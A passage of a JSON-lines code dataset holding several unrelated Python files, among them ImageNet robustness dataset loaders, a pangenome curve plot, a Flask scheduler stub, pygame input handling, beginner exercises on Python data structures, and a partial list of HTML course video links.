new_genes_curve, color = 'orange', label = \"New\")\r\nax.set_xlabel('Number of genomes', fontsize = 12)\r\nax.set_ylabel('Number of clusters', fontsize =12)\r\n\r\nax.text(1, 8000, r'$y = 2463.35 x ^ {0.27}$', fontsize = 12)\r\nax.text (1, 7000,\r\n r'$\\gamma = {0:0.2f} \\pm {1:0.4f}$'.format(gamma, err_pan[0]))\r\n\r\nax.text(60, 2000, r'$y = 569.97 x ^ {-0.69}$', fontsize = 12)\r\nax.text (60, 1000,\r\n r'$\\alpha = {0:0.2f} \\pm {1:0.3f}$'.format(-alpha, err_core[0]))\r\nax.grid()\r\nax.legend(loc=\"center right\")\r\n\r\n#plots 2\r\nfig1, ((ax1, ax2)) = plt.subplots(ncols = 2, figsize = (7,3.5))\r\nax1.plot(genomes, pangenome, '+', color = \"bisque\")\r\nax1.plot(genomes_curve, pangenome_curve, 'darkorange', label = \"Total\")\r\nax2.plot(genomes_new, new_genes, '+', color = \"khaki\")\r\nax2.plot(genomes_curve, new_genes_curve, color = 'orange', label = \"New\")\r\nax1.set_xlabel('Number of genomes', fontsize= 12)\r\nax1.set_ylabel('Number of clusters', fontsize= 12)\r\nax1.set_xlim(1, 120)\r\n\r\nax2.set_xlabel('Number of genomes', fontsize= 12)\r\n#ax2.set_ylabel('Number of clusters')\r\nax2.set_xlim(1, 120)\r\n\r\nax1.text(50, 5000, r'$y = 2463.35 x ^ {0.27}$', fontsize = 12)\r\nax1.text (50, 4200,\r\n r'$\\gamma = {0:0.2f} \\pm {1:0.4f}$'.format(gamma, err_pan[0]))\r\n\r\nax2.text(40, 500, r'$y = 569.97 x ^ {-0.69}$', fontsize = 12)\r\nax2.text (40, 400,\r\n r'$\\alpha = {0:0.2f} \\pm {1:0.3f}$'.format(-alpha, err_core[0]))\r\nax1.grid()\r\nax1.legend()\r\nax2.grid()\r\nax2.legend()\r\n\r\nfig1.savefig(\"Micropan_new_total.svg\", dpi=1200, format = 'svg')\r\n\r\n\r\n\r\n","repo_name":"CarlosCaicedoM/python_bioinformatics","sub_path":"micropan_total_new_power_law_fit.py","file_name":"micropan_total_new_power_law_fit.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"30748400975","text":"import logging\nimport os\nfrom typing import Callable, Optional\n\nimport numpy as np\nfrom PIL import Image\nfrom torch.utils.data.dataset import Dataset\nfrom torchvision.datasets import ImageFolder\nfrom torchvision.datasets.utils import check_integrity, download_and_extract_archive, verify_str_arg\nfrom tqdm import tqdm\n\n_logger = logging.getLogger(__name__)\n\n\nclass ImageNetA(ImageFolder):\n \"\"\"ImageNetA dataset.\n\n - Paper: [https://arxiv.org/abs/1907.07174](https://arxiv.org/abs/1907.07174).\n \"\"\"\n\n base_folder = \"imagenet-a\"\n url = \"https://people.eecs.berkeley.edu/~hendrycks/imagenet-a.tar\"\n filename = \"imagenet-a.tar\"\n tgz_md5 = \"c3e55429088dc681f30d81f4726b6595\"\n\n def __init__(self, root: str, split=None, transform: Optional[Callable] = None, download: bool = False, **kwargs):\n\n self.root = root\n\n if download:\n self.download()\n\n if not self._check_integrity():\n raise RuntimeError(\"Dataset not found or corrupted.\" + \" You can use download=True to download it\")\n\n super().__init__(root=os.path.join(root, self.base_folder), transform=transform, **kwargs)\n\n def _check_exists(self) -> bool:\n return os.path.exists(os.path.join(self.root, self.base_folder))\n\n def _check_integrity(self) -> bool:\n return check_integrity(os.path.join(self.root, self.filename), self.tgz_md5)\n\n def download(self) -> None:\n if self._check_integrity() and self._check_exists():\n _logger.debug(\"Files already downloaded and verified\")\n return\n download_and_extract_archive(self.url, self.root, filename=self.filename, md5=self.tgz_md5)\n\n\nclass ImageNetO(ImageNetA):\n \"\"\"ImageNetO datasets.\n\n Contains unknown classes to ImageNet-1k.\n\n\n - Paper: [https://arxiv.org/abs/1907.07174](https://arxiv.org/abs/1907.07174)\n \"\"\"\n\n base_folder = \"imagenet-o\"\n url = \"https://people.eecs.berkeley.edu/~hendrycks/imagenet-o.tar\"\n filename = \"imagenet-o.tar\"\n tgz_md5 = \"86bd7a50c1c4074fb18fc5f219d6d50b\"\n\n\nclass ImageNetR(ImageNetA):\n \"\"\"ImageNet-R(endition) dataset.\n\n Contains art, cartoons, deviantart, graffiti, embroidery, graphics, origami, paintings,\n patterns, plastic objects,plush objects, sculptures, sketches, tattoos, toys,\n and video game renditions of ImageNet-1k classes.\n\n - Paper: [https://arxiv.org/abs/2006.16241](https://arxiv.org/abs/2006.16241)\n \"\"\"\n\n base_folder = \"imagenet-r\"\n url = \"https://people.eecs.berkeley.edu/~hendrycks/imagenet-r.tar\"\n filename = \"imagenet-r.tar\"\n tgz_md5 = \"a61312130a589d0ca1a8fca1f2bd3337\"\n\n\nCORRUPTIONS = [\n \"brightness\",\n \"contrast\",\n \"defocus_blur\",\n \"elastic_transform\",\n \"fog\",\n \"frost\",\n \"gaussian_blur\",\n \"gaussian_noise\",\n \"glass_blur\",\n \"impulse_noise\",\n \"jpeg_compression\",\n \"motion_blur\",\n \"pixelate\",\n \"saturate\",\n \"shot_noise\",\n \"snow\",\n \"spatter\",\n \"speckle_noise\",\n \"zoom_blur\",\n]\n\n\nclass ImageNetC(ImageNetA):\n \"\"\"Corrupted version of the ImageNet-1k dataset.\n\n It contains the following subsets:\n\n - `noise` (21GB): gaussian_noise, shot_noise, and impulse_noise.\n - `blur` (7GB): defocus_blur, glass_blur, motion_blur, and zoom_blur.\n - `weather` (12GB): frost, snow, fog, and brightness.\n - `digital` (7GB): contrast, elastic_transform, pixelate, and jpeg_compression.\n - `extra` (15GB): speckle_noise, spatter, gaussian_blur, and saturate.\n\n - Paper: [https://arxiv.org/abs/1903.12261v1](https://arxiv.org/abs/1903.12261v1)\n \"\"\"\n\n split_list = [\"blur\", \"digital\", \"extra\", \"noise\", \"weather\"]\n base_folder_name = \"ImageNetC\"\n url_base = \"https://zenodo.org/record/2235448/files/\"\n tgz_md5_list = [\n \"2d8e81fdd8e07fef67b9334fa635e45c\",\n \"89157860d7b10d5797849337ca2e5c03\",\n \"d492dfba5fc162d8ec2c3cd8ee672984\",\n \"e80562d7f6c3f8834afb1ecf27252745\",\n \"33ffea4db4d93fe4a428c40a6ce0c25d\",\n ]\n corruptions = CORRUPTIONS\n\n def __init__(\n self,\n root: str,\n split: str,\n intensity: int,\n transform: Optional[Callable] = None,\n download: bool = False,\n **kwargs,\n ) -> None:\n self.root = os.path.expanduser(root)\n self.corruption = verify_str_arg(split, \"split\", self.corruptions)\n split_group = self._get_corruption_group(self.corruption)\n\n self._base_folder = os.path.join(root, self.base_folder_name, split_group)\n self.filename = split_group + \".tar\"\n self.url = self.url_base + self.filename\n self.tgz_md5 = self.tgz_md5_list[self.split_list.index(split_group)]\n\n self.base_folder = os.path.join(self._base_folder, split, str(intensity))\n\n super().__init__(root, transform=transform, download=download, **kwargs)\n\n def download(self) -> None:\n if self._check_integrity() and self._check_exists():\n _logger.debug(\"Files already downloaded and verified\")\n return\n download_and_extract_archive(\n self.url, self.root, extract_root=self._base_folder, filename=self.filename, md5=self.tgz_md5\n )\n\n @staticmethod\n def _get_corruption_group(corruption: str):\n split_group = \"\"\n if corruption in [\"defocus_blur\", \"glass_blur\", \"motion_blur\", \"zoom_blur\"]:\n split_group = \"blur\"\n elif corruption in [\"contrast\", \"elastic_transform\", \"pixelate\", \"jpeg_compression\"]:\n split_group = \"digital\"\n elif corruption in [\"speckle_noise\", \"spatter\", \"gaussian_blur\", \"saturate\"]:\n split_group = \"extra\"\n elif corruption in [\"gaussian_noise\", \"shot_noise\", \"impulse_noise\"]:\n split_group = \"noise\"\n elif corruption in [\"frost\", \"snow\", \"fog\", \"brightness\"]:\n split_group = \"weather\"\n return split_group\n\n\ndef _imagenet_c_to_npz(root: str, split: str, intensity: int, dest_folder: str = \"ImageNetCnpz\") -> None:\n\n dataset = ImageNetC(root, split, intensity, download=True)\n assert len(dataset) == 50_000, \"ImageNetC should have 50,000 images. Please check the dataset.\"\n image_example = dataset[0][0]\n width, height = image_example.size\n _logger.info(\"Image size: %d x %d\", width, height)\n x = np.ndarray(shape=(len(dataset), height, width, 3), dtype=np.uint8)\n y = np.ndarray(shape=(len(dataset)), dtype=np.int32)\n for i in tqdm(range(len(dataset))):\n image, label = dataset[i]\n x[i] = image\n y[i] = label\n\n os.makedirs(os.path.join(root, dest_folder), exist_ok=True)\n np.savez(os.path.join(root, dest_folder, f\"{split}-{intensity}.npz\"), x=x, y=y)\n\n\nclass ImageNetCnpz(Dataset):\n \"\"\"Corrupted version of the ImageNet-1k dataset saved in npz format.\"\"\"\n\n corruptions = CORRUPTIONS\n base_folder_name = \"ImageNetCnpz\"\n\n def __init__(\n self,\n root: str,\n split: str,\n intensity: int,\n transform: Optional[Callable] = None,\n download: bool = False,\n **kwargs,\n ) -> None:\n super().__init__()\n self.root = os.path.expanduser(root)\n self.corruption = verify_str_arg(split, \"split\", self.corruptions)\n self.intensity = int(intensity)\n self.path = os.path.join(self.root, self.base_folder_name, f\"{split}-{intensity}.npz\")\n self.transform = transform\n if download:\n self.download()\n\n data = np.load(self.path, mmap_mode=\"r\")\n self.images = data[\"x\"]\n self.labels = data[\"y\"]\n\n def __getitem__(self, index):\n x = self.images[index]\n x = Image.fromarray(x)\n\n if self.transform:\n x = self.transform(x)\n\n y = self.labels[index]\n return x, y\n\n def __len__(self):\n return len(self.images)\n\n def _check_exists(self) -> bool:\n return os.path.exists(self.path)\n\n def download(self) -> None:\n if self._check_exists():\n return\n _imagenet_c_to_npz(self.root, self.corruption, self.intensity, self.base_folder_name)\n","repo_name":"edadaltocg/detectors","sub_path":"src/detectors/data/imagenet.py","file_name":"imagenet.py","file_ext":"py","file_size_in_byte":8021,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"43679368257","text":"from flask import Flask\nfrom flask_apscheduler import APScheduler\nimport schedule\n\napp = Flask(__name__)\n\n\n# initialize scheduler\nscheduler = APScheduler()\n# if you don't wanna use a config, you can set options here:\n# scheduler.api_enabled = True\nscheduler.init_app(app)\nscheduler.start()\n\n\n@app.route('/')\ndef hello_world(): # put application's code here\n return 'Hello World!'\n\n\n\nclass Config(object):\n SCHEDULER_API_ENABLED = True\n \napp.config.from_object(Config())\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"raiots/PicoSec","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71938645229","text":"import json\nimport os\n\nfrom . import command\nfrom ..bundle import slug_for_race\n\n\nclass CandidateConfigToJson(object):\n \"\"\"Describe the candidate configurations as JSON\"\"\"\n\n def __init__(self, status):\n \"\"\"Constructor for the analyzer.\n :param status: The CollectorStatus object that tracks status state\n \"\"\"\n self.status = status\n\n def default_path(self):\n return os.path.join(self.status.analyzed_data_folder_path(), \"analysis_config.json\")\n\n def save(self, path=None):\n \"\"\"Write out JSON describing the candidate config to path\"\"\"\n\n if not path:\n path = self.default_path()\n races = []\n for race in self.status.races():\n race_dict = {\"slug\": race.slug, \"candidates\": []}\n races.append(race_dict)\n for candidate in race.candidates.all():\n terms = [term.term for term in candidate.search_terms.all()]\n candidate_dict = {\"name\": candidate.name, \"terms\": terms}\n race_dict[\"candidates\"].append(candidate_dict)\n with open(path, \"w\") as f:\n json.dump(races, f)\n\n\nclass AnalyzerConfig(command.ProcessCommandConfig):\n \"\"\"Gathers configuration information for the Analyzer\"\"\"\n def __init__(self, status, driver, script, description, max_depth=5, just_config=False):\n \"\"\"The config determines which driver is run and where the results end up\"\"\"\n super(AnalyzerConfig, self).__init__(driver, script, description, max_depth, just_config)\n self.output_path_components = lambda race, run=None: status.analysis_result_path_components(race, None, run)\n\n\nclass MetadataAnalyzerConfig(command.ProcessCommandConfig):\n \"\"\"Configuration for running metadata analysis\"\"\"\n def __init__(self, status, max_depth=5, just_config=False):\n super(MetadataAnalyzerConfig, self).__init__(\"MetadataSummary\", \"mdsummary.rb\", \"Analyzing\", max_depth, just_config)\n self.output_path_components = lambda race, run=None: status.analysis_result_path_components(race, \"metadata\", run)\n\n\nclass MetadataPlusAnalyzerConfig(command.ProcessCommandConfig):\n \"\"\"Configuration for running metadata analysis\"\"\"\n def __init__(self, status, max_depth=5, just_config=False):\n super(MetadataPlusAnalyzerConfig, self).__init__(None, \"mdsummary_plus.rb\", \"Analyzing\", max_depth, just_config)\n self.output_path_components = lambda race, run=None: status.analysis_result_path_components(race, \"mdplus\", run)\n\n\nclass HashtagAnalyzerConfig(command.ProcessCommandConfig):\n \"\"\"Configuration for running metadata analysis\"\"\"\n def __init__(self, status, max_depth=5, just_config=False):\n super(HashtagAnalyzerConfig, self).__init__(\"HashtagSummary\", \"hashtags.rb\", \"Analyzing Hashtags\", max_depth, just_config)\n self.output_path_components = lambda race, run=None: status.analysis_result_path_components(race, \"hashtag\", run)\n\n\nclass GenericAnalyzer(command.ProcessCommand):\n \"\"\"Analyze pruned runs based on the configuration\"\"\"\n\n def __init__(self, status, config=None, race=None):\n \"\"\"Constructor for the analyzer.\n :param status: The CollectorStatus object that tracks status state\n :param config: The configuration for the pruner\n :param race: The slug for a race if should restrict to one race\n \"\"\"\n self.status = status\n if not config:\n # Default to metadata analyzer\n config = MetadataAnalyzerConfig(status)\n self.config = config\n super(GenericAnalyzer, self).__init__(self.status, config, race)\n\n def prepare_processing(self, races):\n \"\"\"Do any preparation necessary to process the races. Default does nothing.\"\"\"\n for race in races:\n parent = self.config.output_path_components(race)\n self.status.ensure_folder_exists(self.status.path_from_components(parent))\n if len(races) > 0:\n CandidateConfigToJson(self.status).save()\n\n def queue_processing(self, race, run):\n pruned_data_path = self.status.pruned_data_file_path_for_run(race, run)\n analyzed_data_path_components = self.config.output_path_components(race, run)\n msg = \"{} run: {}\".format(self.process_description(), pruned_data_path.encode('utf-8'))\n self.status.progress_func({'type': 'analyze', 'message': msg})\n self.add_spark_task(pruned_data_path, analyzed_data_path_components, slug_for_race(race))\n","repo_name":"ciyer/smet-collect","sub_path":"src/python/smet-collect/smetcollect/process/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"1579563444","text":"import sys\nimport pygame\ndef check_keydown_events(event,ship):\n #Response button\n if event.key == pygame.K_RIGHT:\n ship.moving_right = True\n \n elif event.key == pygame.K_LEFT:\n ship.moving_left =True\n\ndef check_keyup_events(event,ship):\n #Response release\n if event.key == pygame.K_RIGHT:\n ship.moving_right =False \n elif event.key == pygame.K_LEFT:\n ship.moving_left = False\ndef check_events(ship):\n \n #Response to button and mouse events\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type==pygame.KEYDOWN:\n check_keydown_events(event,ship)\n \n \n elif event.type == pygame.KEYUP:\n check_keyup_events(event, ship)\n \ndef update_screen(ai_settings,screen,ship):\n #Update the image on the screen and switch to the new screen\n \n #Redraw the screen every time you cycle\n screen.fill(ai_settings.bg_color)\n ship.blitme()\n \n #Make the recently drawn screen visible\n pygame.display.flip()\n \n \n","repo_name":"mcl19909949541/programming","sub_path":"program/#python_work/alien_invasion - 副本/game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"33015543730","text":"# Exercise 1\n# Create a list with 5 items (French names of people) and output the 2nd item:\nnames = [\"Jean\", \"Pierre\", \"Claire\", \"Marie\", \"Luc\"]\nprint(names[1]) # Output: Pierre\n\n# Change the value of the first item to a new value:\nnames[0] = \"Louis\"\nprint(names) # Output: ['Louis', 'Pierre', 'Claire', 'Marie', 'Luc']\n\n# Add a sixth item to the list:\nnames.append(\"Sophie\")\nprint(names) # Output: ['Louis', 'Pierre', 'Claire', 'Marie', 'Luc', 'Sophie']\n\n# Add \"Bathel\" as the 3rd item in your list\nnames.insert(2, \"Bathel\")\nprint(names) # Output: ['Louis', 'Pierre', 'Bathel', 'Claire', 'Marie', 'Luc', 'Sophie']\n\n# Remove the 4th item from the list:\ndel names[3]\nprint(names) # Output: ['Louis', 'Pierre', 'Bathel', 'Marie', 'Luc', 'Sophie']\n\n# Use negative indexing to print the last item in your list:\nprint(names[-1]) # Output: Sophie\n\n# Create a new list with 7 items and print the 3rd, 4th, and 5th items:\nnew_list = ['Apple', 'Banana', 'Cherry', 'Date', 'Elderberry', 'Fig', 'Grape']\nprint(new_list[2:5]) # Output: ['Cherry', 'Date', 'Elderberry']\n\n# Create a list of countries and make a copy of it:\ncountries = ['USA', 'Canada', 'France', 'Germany', 'Australia']\ncountries_copy = countries.copy()\nprint(countries_copy)\n\n# Loop through the list of countries:\nfor country in countries:\n print(country)\n\n# Sort a list of animal names in both descending and ascending order\nanimal_names = ['Zebra', 'Elephant', 'Lion', 'Tiger', 'Giraffe']\nanimal_names.sort() # Ascending order\nprint(animal_names) # Output: ['Elephant', 'Giraffe', 'Lion', 'Tiger', 'Zebra']\n\n\nanimal_names.sort(reverse=True) # Descending order\nprint(animal_names) # Output: ['Zebra', 'Tiger', 'Lion', 'Giraffe', 'Elephant']\n\n# Output only animal names with the letter 'a' in them:\n\nfor name in animal_names:\n if 'a' in name.lower():\n print(name)\n\n# Join two lists containing first and second names\nfirst_names = ['Julius', 'Trevor', 'Michael', 'Emma']\nlast_names = ['Kazibwe', 'Ssemwogerere', 'Johnson', 'Williams']\n\nfull_names = []\nfor first, last in zip(first_names, last_names):\n full_names.append(f\"{first} {last}\")\n\nprint(full_names)\n\n#Exercise 2\n# Output your favorite phone brand\nx = (\"samsung\", \"iphone\", \"tecno\", \"redmi\")\nprint(x[1]) # Output: iphone\n\n# Use negative indexing to print the 2nd last item in the tuple\nprint(x[-2]) # Output: tecno\n\n# Update \"iphone\" to \"itel\" in the phones list\nphone_list = list(x)\nphone_list[1] = \"itel\"\nx = tuple(phone_list)\nprint(x) # Output: ('samsung', 'itel', 'tecno', 'redmi')\n\n# Add \"Huawei\" to the tuple:\n\nx = x + (\"Huawei\",)\nprint(x) # Output: ('samsung', 'itel', 'tecno', 'redmi', 'Huawei')\n\n# Loop through the tuple\nfor phone in x:\n print(phone)\n\n# Remove the first item in the tuple\nx = x[1:]\nprint(x) # Output: ('itel', 'tecno', 'redmi', 'Huawei')\n\n# Create a tuple of cities in Uganda using the tuple() constructor\ncities = tuple([\"Kampala\", \"Entebbe\", \"Jinja\", \"Gulu\"])\nprint(cities)\n\n# Unpack your tuple\nbrand1, brand2, brand3, brand4 = x\nprint(brand1, brand2, brand3, brand4)\n\n# Print the 2nd, 3rd, and 4th cities in the tuple\nprint(cities[1:4]) # Output: ('Entebbe', 'Jinja', 'Gulu')\n\n#Join two tuples containing first and second names:\nfirst_names = (\"John\", \"Jane\", \"Michael\")\nlast_names = (\"Doe\", \"Smith\", \"Johnson\")\n\nfull_names = first_names + last_names\nprint(full_names)\n\n# Create a tuple of colors and multiply it by 3:\ncolors = (\"red\", \"blue\", \"green\")\nmultiplied_colors = colors * 3\nprint(multiplied_colors)\n\n# Count the number of times 8 appears in the tuple (1, 3, 7, 8, 7, 5, 4, 6, 8, 5):\nthistuple = (1, 3, 7, 8, 7, 5, 4, 6, 8, 5)\ncount_8 = thistuple.count(8)\nprint(count_8) # Output: 2\n\n# Exercise 3\n# initialize a set called beverages\nbeverages = set([\"coffee\", \"tea\", \"juice\"])\nprint(beverages)\n\n# Add 2 more items to the beverages set\nbeverages.update([\"water\", \"soda\"])\nprint(beverages) # Output: {'coffee', 'juice', 'water', 'soda', 'tea'}\n\n# Check if \"microwave\" is present in the set\n\nmySet = {\"oven\", \"kettle\", \"microwave\", \"refrigerator\"}\nif \"microwave\" in mySet:\n print(\"Microwave is present in the set.\")\nelse:\n print(\"Microwave is not present in the set.\")\n\n# Remove \"kettle\" from the set\nmySet.remove(\"kettle\")\nprint(mySet) # Output: {'oven', 'microwave', 'refrigerator'}\n\n#Loop through the set\nfor item in mySet:\n print(item)\n\n# Add elements in a list to elements in a set\nmySet = {1, 2, 3, 4}\nmyList = [5, 6]\nmySet.update(myList)\nprint(mySet) # Output: {1, 2, 3, 4, 5, 6}\n\n# Join two sets containing ages and first names\nages = {16, 19}\nfirst_names = {\"Ken\", \"David\"}\njoined_set = ages.union(first_names)\nprint(joined_set)\n\n# Exercise 4\n# Concatenate an integer and a string\n\nnum = 2\nstring = \"apples\"\nresult = str(num) + string\nprint(result) # Output: 2apples\n\n# Remove spaces at the beginning, in the middle, and at the end of a string\ntxt = \" Hello, Uganda! \"\nresult = txt.strip()\nprint(result) # Output: \"Hello, Uganda!\"\n\n# Convert the value of 'txt' to uppercase\ntxt = \"Hello, Uganda!\"\nresult = txt.upper()\nprint(result) # Output: \"HELLO, UGANDA!\"\n\n# Replace character 'U' with 'V' in a string:\ntxt = \"Hello, Uganda!\"\nresult = txt.replace('U', 'V')\nprint(result) # Output: \"Hello, Vganda!\"\n\n# Return a range of characters in the 2nd, 3rd, and 4th position\ny = \"I am proudly Ugandan\"\nresult = y[1:4]\nprint(result) # Output: \" am\"\n\n# Correct the code to remove the error\nx = 'All \"Data Scientists\" are cool!' # In this case, I removed the outermost quotation marks to fix the error.\nprint(x) # Output: All \"Data Scientists\" are cool!\n\n\n# Exercise 5\n# Print the value of the shoe size\nShoes = {\n \"brand\": \"Nick\",\n \"color\": \"black\",\n \"size\": 40\n}\n\nprint(Shoes[\"size\"]) # Output: 40\n\n# Change the value \"Nick\" to \"Adidas\"\nShoes[\"brand\"] = \"Adidas\"\nprint(Shoes) # Output: {'brand': 'Adidas', 'color': 'black', 'size': 40}\n\n# Add a key/value pair \"type\": \"sneakers\" to the dictionary\n\nShoes[\"type\"] = \"sneakers\"\nprint(Shoes) # Output: {'brand': 'Adidas', 'color': 'black', 'size': 40, 'type': 'sneakers'}\n\n# Return a list of all the keys in the dictionary\n\nkeys = list(Shoes.keys())\nprint(keys) # Output: ['brand', 'color', 'size', 'type']\n\n# alternative \nkeys = list(Shoes) # Using the dictionary itself as an iterable\nprint(keys) # Output: ['brand', 'color', 'size']\n\n\n# Return a list of all the values in the dictionary\nvalues = list(Shoes.values())\nprint(values) # Output: ['Adidas', 'black', 40, 'sneakers']\n\n# Check if the key \"size\" exists in the dictionary\nif \"size\" in Shoes:\n print(\"Key 'size' exists in the dictionary.\")\nelse:\n print(\"Key 'size' does not exist in the dictionary.\")\n\n# Loop through the dictionary\nfor key, value in Shoes.items():\n print(key, \":\", value)\n\n# alterrnative \nfor key in Shoes:\n print(key, \":\", Shoes[key])\n\n\n# Remove \"color\" from the dictionary\ndel Shoes[\"color\"]\nprint(Shoes) # Output: {'brand': 'Adidas', 'size': 40, 'type': 'sneakers'}\n\n# Empty the dictionary\nShoes.clear()\nprint(Shoes) # Output: {}\n\n# Create a dictionary and make a copy of it\noriginal_dict = {\"name\": \"John\", \"age\": 25}\ncopied_dict = dict(original_dict)\nprint(copied_dict) # Output: {'name': 'John', 'age': 25}\n\n# Show nested dictionaries\ndata = {\n \"person1\": {\n \"name\": \"John\",\n \"age\": 25\n },\n \"person2\": {\n \"name\": \"Jane\",\n \"age\": 30\n }\n}\n\nfor person, details in data.items():\n print(\"Person:\", person)\n for key, value in details.items():\n print(key, \":\", value)\n print()\n","repo_name":"julius-kazibwe/recess_assignments","sub_path":"julius_Kazibwe_evening.py","file_name":"julius_Kazibwe_evening.py","file_ext":"py","file_size_in_byte":7491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"37038366036","text":"html = [\n {\n \"name\": \"Introdução ao Curso\",\n \"badge\": None,\n \"type\": 2,\n \"urls\": [{\n \"name\": \"Começa aqui o curso\",\n \"url\": \"https://www.youtube.com/watch?v=Ejkb_YpuHWs&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=1\"\n }, {\n \"name\": \"O que vamos aprender no módulo 1?\",\n \"url\": \"https://www.youtube.com/watch?v=jgQjeqGRdgA&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=2\"\n }, {\n \"name\": \"Precisamos fazer um acordo\",\n \"url\": \"https://www.youtube.com/watch?v=VfIXgGJWLvA&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=3\"\n }, {\n \"name\": \"Será que esse curso é para mim?\",\n \"url\": \"https://www.youtube.com/watch?v=57wyfS560Uk&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=4\"\n }, {\n \"name\": \"Melhores livros pra aprender HTML5 e CSS3\",\n \"url\": \"https://www.youtube.com/watch?v=0zLjVhHdOm8&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=5\"\n }],\n \"sugg_prevs\": [],\n \"sugg_nexts\": [40]\n }, # 62\n {\n \"name\": \"Instalar ferramentas para programar - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Instalar ferramentas para programar - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=UForX7ehChM&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=11\"\n }],\n \"sugg_prevs\": [44],\n \"sugg_nexts\": []\n }, # 63\n {\n \"name\": \"Primeiro código - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Primeiro código - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=E6CdIawPTh0&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=12\"\n }],\n \"sugg_prevs\": [63],\n \"sugg_nexts\": []\n }, # 64\n {\n \"name\": \"Parágrafos e Quebras - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Parágrafos e Quebras - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=f6NTJdtEFOc&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=13\"\n }],\n \"sugg_prevs\": [64],\n \"sugg_nexts\": []\n }, # 65\n {\n \"name\": \"Símbolos e Emojis - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Símbolos e Emojis - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=nhMdFe3WwYc&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=14\"\n }],\n \"sugg_prevs\": [65],\n \"sugg_nexts\": []\n }, # 66\n {\n \"name\": \"Direitos de imagem: Copyright vs Creative Commons - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Direitos de imagem: Copyright vs Creative Commons - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=bDULqeGEvAw&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=15\"\n }],\n \"sugg_prevs\": [66],\n \"sugg_nexts\": []\n }, # 67\n {\n \"name\": \"Formatos de Imagem - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Formatos de Imagem - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=xg-vHgLF0mI&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=16\"\n }],\n \"sugg_prevs\": [67],\n \"sugg_nexts\": []\n }, # 68\n {\n \"name\": \"Tamanhos de Imagens - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Tamanhos de Imagens - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=8rkuukKA8a4&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=17\"\n }],\n \"sugg_prevs\": [68],\n \"sugg_nexts\": []\n }, # 69\n {\n \"name\": \"A tag img - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"A tag img - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=CwOmEetWMnU&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=18\"\n }],\n \"sugg_prevs\": [69],\n \"sugg_nexts\": []\n }, # 70\n {\n \"name\": \"Alterar Favicon de um site - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Alterar Favicon de um site - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=1ZeettFfxys&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=19\"\n }],\n \"sugg_prevs\": [70],\n \"sugg_nexts\": []\n }, # 71\n {\n \"name\": \"Hierarquia de títulos - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Hierarquia de títulos - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=aiOEBhozEOg&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=20\"\n }],\n \"sugg_prevs\": [71],\n \"sugg_nexts\": []\n }, # 72\n {\n \"name\": \"Semântica na HTML5 - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Semântica na HTML5 - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=HaSgt1hK2Fs&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=21\"\n }],\n \"sugg_prevs\": [72],\n \"sugg_nexts\": []\n }, # 73\n {\n \"name\": \"Negrito e Itálico - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Negrito e Itálico - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=T-d_hsO3hUI&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=22\"\n }],\n \"sugg_prevs\": [73],\n \"sugg_nexts\": []\n }, # 74\n {\n \"name\": \"Formatações adicionais - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Formatações adicionais - HTML\",\n \"url\": 